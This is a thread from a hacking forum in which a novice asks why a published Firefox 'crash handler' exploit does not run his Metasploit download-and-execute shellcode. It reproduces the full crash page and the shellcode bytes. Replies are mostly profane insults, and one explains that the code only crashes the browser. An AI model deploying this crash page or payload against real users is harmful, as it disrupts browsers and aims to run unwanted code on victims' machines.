Welcome to HBH! If you have tried to register and didn't get a verification email, please using the following link to resend the verification email.

remote execution not working?


ghost's Avatar
0 0

Hey guys. I've been browsing the site from time to time and I finally decided to join. I am really trying hard to escape the "skiddy" phase and actually do some real learning, and what better way to learn then through trial and error right? Some other sites (which wont be named) pride themselves on the "Download Keyloggers" section, but dont have anything to actually learn from. Anyway, enough about that, onto the question:

So I've been messing some code here that is supposed to allow remote execution of code through firefox based on what im told. The code effectively crashes my firefox when I dont have my custom payload, but when I try to put my own thing inside, it still crashes and does not execute. I have just recently started playing with exploits so I am not too familiar with what im doing. Basically here is whats going on:

Got an exploit from injector. I was told this allows remote execution of code:

#==
# Title : Mozilla Firefox (all) Crash Handler Vulnerabilities
# Author : KedAns-Dz
# E-mail : [email="ked-h@hotmail.com"]ked-h@hotmail.com[/email]
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter : [twitter.com/kedans](twitter.com/kedans)
# platform : windows
# Impact : Crash Handler
# Tested on : Windows XP Sp3 FR & Linux Ubuntu 8.10 En ( Back-Track 4 'R1')
# Target : Mozilla Firefox (all)
# ** this Vulnerabilities is expectant in all Versions 2 etc ... 3.x **
#==
# Note : BAC 2011 Enchallah ( Me & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
###
# == HTML (1) ==>
<html>
<head>
<body onload="javascript:KeD();">
<script language="JavaScript">
  function KeD()
  {
    var buffer = '\x42';
  for(i=0; i <= 999 ; ++i)
  buffer+=buffer+
    window.open(buffer+buffer+buffer,width=-99,height=-99); // Open New Windows & Crash !!
  }
</script>
</head>
</body>
</html>
# == HTML (2) ==>
<html>
<head>
<body onload="javascript:AnS();">
<script language="JavaScript">
  function AnS()
  {
    var buffer = '\x42';
  for(i=0; i <= 999 ; ++i)
  buffer+=buffer+
    window.open(buffer+buffer+buffer,fullscreen=true); // Open New Windows & Crash !!
  }
</script>
</head>
</body>
</html>
#==[ Exploited By KedAns-Dz * HaCerS-StreeT-Team-Dz * ]==
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
# Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz
# Masimovic * TOnyXED * cr4wl3r (Inj3ct0r.com) * TeX (hotturks.org) * KelvinX (kelvinx.net) * Dos-Dz
# Nayla Festa * all (sec4ever.com) Members * PLATEN (Pentesters.ir) * Gamoscu ([www.1923turk.com](www.1923turk.com))
# Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{
# Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX
# Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,
# [www.packetstormsecurity.org](www.packetstormsecurity.org) * exploit-db.com * bugsearch.net * 1337day.com * x000.com
# [www.metasploit.com](www.metasploit.com) * [www.securityreason.com](www.securityreason.com) *  All Security and Exploits Webs ...
#==

# 1337day.com [2011-03-27]

First of all, do I choose either section of html, or do I use them both? I have tried many things to no avail. Anyways, where it says '\x42' I put my own payload that was generated through MetaSploit. It looks like this:

"\xf4\x5e\x31\xc9\xb1\x60\x83\xee\xfc\x31"+
"\x46\x0f\x03\x46\xf5\x92\xed\x49\x19\x09"+
"\x44\xbd\xd0\xcb\xe1\xfd\xe3\x93\x26\xf4"+
"\x7a\x71\xbc\xe3\x79\x9e\xaa\x0b\x7e\xa1"+
"\x5d\xb8\x19\xc7\x07\x83\xe4\xc0\x9e\x9d"+
"\x8f\xa8\xf3\x44\x3a\xd8\x1a\xf3\x70\xcf"+
"\x05\x6d\x6a\xae\xa7\x64\x2f\x22\x25\xff"+
"\xce\xd9\xdf\x12\xf7\x67\x85\x71\xe5\x40"+
"\x37\xdf\x7d\xa0\x86\xe8\x6f\x98\x8d\x8b"+
"\x9d\x8f\x42\xdc\x61\x25\x9a\x0e\xf0\x7a"+
"\x22\xca\xac\xe7\x77\x90\x20\xd8\x4e\xa0"+
"\xd2\x8c\x5c\xf0\x6f\xb6\x3b\x46\xf7\x5d"+
"\xe3\xfc\x57\x9d\x06\x90\x45\xbe\xa2\x08"+
"\x33\x18\xd5\xb7\x59\xc0\x37\x51\xc7\xab"+
"\x25\x02\xe5\x25\x50\x9b\x9e\xa8\x2d\xd0"+
"\x3d\x0c\xdc\xdf\xa4\x14\x86\xfa\x89\xb2"+
"\x72\x35\x53\x75\xe1\x09\x89\xc8\x19\x15"+
"\x6d\xbb\x79\xbf\xf4\xa5\x98\x9f\x8c\x19"+
"\x43\x06\x37\xbc\x90\x5a\x2e\x10\x71\x5a"+
"\x4a\x1b\x3b\x76\x2f\x10\x82\xbd\xc9\x18"+
"\x80\x1f\x88\x3f\xae\x58\x05\xc3\x6f\x44"+
"\xf3\xa1\x71\x8a\x9a\x43\xdb\x2a\x55\xba"+
"\xd6\x02\xac\x5b\x29\xf9\x3c\xe1\x7c\xc8"+
"\x26\x27\x17\x04\xc0\x79\x85\x3c\x55\xb3"+
"\x4a\x18\x89\xdb\xba\x51\x9e\xd6\x5d\x2d"+
"\xe3\x27\x93\xca\x94\x0d\x8d\x76\x2b\xed"+
"\x48\xe1\xad\xcf\x69\x00\xf8\x1b\x67\x21"+
"\x22\x26\x75\x3d\x2e\x33\x6c\x5b\x10\x38"+
"\x9c\x96\x4c\x2b\xb2\xdb\x78\x71\xbd\xcf"+
"\x7c\x70\xd3\xe6\x97\x65\xf4\x9e\xa9\x96"+
"\xf2\x7d\xd4\xab\x07\xe4\xca\xb5\x08\xfa"+
"\x3f\xc4\x02\xf9\x47\xda\x4c\xd7\x41\xdd"+
"\x92\x0d\x5d\xe5\x86\x56\x76\xfa\x81\x3e"+
"\x64\x10\xc4\xb5\x82\x10\xbe\xfa\xa1\x0a"+
"\x1c\xf4\xdb\x42\x6a\x0f\xdb\x50\x58\x06"+
"\xc4\x5b\x96\x1b\x22\x02\x31\x90\xa6\x45"+
"\xe7\x6b\x07\x83\xd5\xcd\xa2\xf9\x5f\xa5"+
"\xdb\x8a\x71\x3f\x4a\x11\xfa\xd0\xe1\xa9"+
"\x31\x5c\xd7\x2a\x59\xcf\x02\x9f\xe3\x7c"+
"\x2d\xb9\x8e\xac\xc8\x3d\x34\x31"```

and of course this is ruby. This is a Windows payload download_exec. My problem here is that it doesnt run.. I have tried making a message box pop up also without success.

I also found another exploit that specifically claims remote execution at:
http://www.1337day.com/exploits/14208

but I have no idea what to do with it. Where does the payload go?

I know im missing something here, but what? Any help is appreciated :D

ghost's Avatar
0 0

Go learn how to fucking program.


ghost's Avatar
0 0

xof wrote: Go learn how to fucking program.

Another 16 year old acting hard with his keyboard. Your cool, bro.

Go Fuck yourself.

Anyone have anything constructive to say?


stealth-'s Avatar
Ninja Extreme
0 0

dryheat360 wrote: [quote]xof wrote: Go learn how to fucking program.

Another 16 year old acting hard with his keyboard. Your cool, bro.

Go Fuck yourself.

Anyone have anything constructive to say? [/quote]

No, he is serious. Just blunt. Allow me to elaborate:

You clearly do not have any understanding of how those exploits work. Not that it is a bad thing, but it just means that you aren't going to learn much from them this way. If you would really like to leave the script kiddie phase, then just randomly trying to run exploits is not the way to do it. You should have the programming knowledge of how these work before you go playing with them, otherwise they aren't going to be of any benefit to you knowledge-wise. We could spoon-feed you here and explain why what you're trying to do isn't what you think it is, but you wouldn't learn much. Honestly, programming knowledge is a must before you play with these.

Hope that clarifies.


ghost's Avatar
0 0

What your saying totally makes sense. What I'm not 100% sure of is why this particular exoit didn't work. I mean the code seems simple enough right?

I am in fact learning programming at the moment. In fact besides what I've learned and continue to learn on my own, I've signed up for classes. My train of though here though was something along the lines of "what better way to learn than through trial and error right?"

Thanks for the response by the way.


ghost's Avatar
0 0

Why don't you just look at the code.

All it's doing is looping through 999 times and appending your 'payload' to the variable buffer each time. On each loop it will also open a window with an address of 'bufferbufferbuffer'. That's a really long address and pretty obvious to as why it's causing your browser to crash. How stupid are you? It says "Mozilla Firefox (all) Crash Handler Vulnerabilities" in the title of your exploit. It's supposed to crash.

You want to learn how to hax0r? Read up on assembly, how programming languages handle memory, compilers, and also some architecture stuff wouldn't be bad either.

Until then you can go fuck yourself you piece of shit skid. Kay bro?


suid's Avatar
Member
0 0

xof wrote: All it's doing is looping through 999 times That loop iterates 1000 times. Misreading numbers of iterations can lead to some nasty consequences.

I realize this is totally off-topic.


spyware's Avatar
Banned
0 0

Not sure why people veered away from the whole bluntness thing.

Fuck off, OP.


Arabian's Avatar
Member
0 0

When I read this code, my brain is full of fuck.


korg's Avatar
Admin from hell
0 0

That's about enough, i think the OP gets the idea now.